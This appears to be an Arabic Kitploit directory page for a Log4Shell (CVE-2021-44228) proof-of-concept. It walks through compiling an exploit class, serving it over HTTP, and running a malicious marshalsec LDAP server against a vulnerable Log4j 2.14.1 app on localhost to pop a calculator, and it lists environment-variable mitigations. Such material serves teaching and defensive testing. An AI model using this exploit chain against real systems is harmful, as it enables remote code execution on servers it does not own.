Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-44228-PoC — CVE-2021-44228 (Log4Shell) إثبات المفهوم | Kitploit
أدوات/GitHubGitHub/sunnyvale-it/cve-2021-44228-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubsunnyvale-it/cve-2021-44228-poc

CVE-2021-44228-PoC

CVE-2021-44228 (Log4Shell) إثبات المفهوم

عرض المستودع
85منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-44228 (Log4Shell) إثبات المفهوم

لا توفر ميزات JNDI المستخدمة في التهيئة ورسائل السجل والمعلمات في Apache Log4j2 <=2.14.1 الحماية ضد LDAP الذي يتحكم به المهاجم ونقاط نهاية JNDI الأخرى ذات الصلة. يمكن للمهاجم الذي يتحكم في رسائل السجل أو معلمات رسائل السجل تنفيذ كود عشوائي يتم تحميله من خوادم LDAP عند تمكين استبدال البحث عن الرسالة.

لمساعدة العملاء في فهم كيفية عمل هذا الثغرة، أعددنا هذا المستودع مع إثبات مفهوم بسيط وفعال.

المتطلبات الأساسية

يجب تثبيت محليًا:

  • Git
  • JDK 11
  • Maven
  • Python

حاليًا، يقوم الكود العشوائي بتشغيل تطبيق الآلة الحاسبة على macOS أو Windows، لذلك يدعم إثبات المفهوم هذين النظامين التشغيليين فقط.

إخلاء مسؤولية

جميع المعلومات والكود مقدمة لأغراض تعليمية فقط و/أو لاختبار أنظمتك الخاصة لهذه الثغرة.

تقنية الهجوم

يشبه إثبات المفهوم هذا ما هو موصوف في الصورة أدناه (الإسناد GovCERT.ch)، باستثناء الخادم الضعيف الذي هو مجرد صف Java بسيط من أجل البساطة. من المهم فهم أن هذه الثغرة قد يتم تشغيلها بطرق مختلفة، وما هو موصوف أدناه هو مجرد واحدة منها.

كيفية تشغيل إثبات المفهوم

قم باستنساخ هذا المستودع

root@kitploit:~
terminal1 $ git clone https://github.com/sunnyvale-it/CVE-2021-44228-PoC.git

قم بتجميع الاستغلال (باستخدام JDK 11)

root@kitploit:~
terminal1 $ javac Exploit.java

قم بتشغيل خادم HTTP لخدمة الاستغلال

root@kitploit:~
terminal1 $ python -m SimpleHTTPServer 8888 --directory .

قم بتشغيل LDAPRefServer الخبيث (بفضل https://github.com/mbechler/marshalsec)

root@kitploit:~
terminal2 $ java -cp tools/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

قم بتشغيل التطبيق المعيب (الذي يحتوي على log4j 2.14.1)

root@kitploit:~
terminal3 $ mvn package && mvn exec:exec

إذا سارت الأمور على ما يرام، يجب أن يظهر تطبيق الآلة الحاسبة (تنفيذ كود عشوائي)

إجراءات التخفيف السريعة (تعمل على إصدارات Log4J من 2.10.0 إلى 2.14.1)

تعيين متغير البيئة LOG4J_FORMAT_MSG_NO_LOOKUPS إلى true

root@kitploit:~
terminal3 $ export LOG4J_FORMAT_MSG_NO_LOOKUPS=true 
root@kitploit:~
terminal3 $ mvn package && mvn exec:exec

في هذه الحالة، يجب ألا يظهر تطبيق الآلة الحاسبة بعد الآن

تشغيل التطبيق مع تعيين خاصية النظام log4j2.formatMsgNoLookups إلى true

root@kitploit:~
terminal3 $ mvn package && mvn exec:exec -Dlog4j2.formatMsgNoLookups=true

في هذه الحالة، يجب ألا يظهر تطبيق الآلة الحاسبة بعد الآن

تنزيل الأداة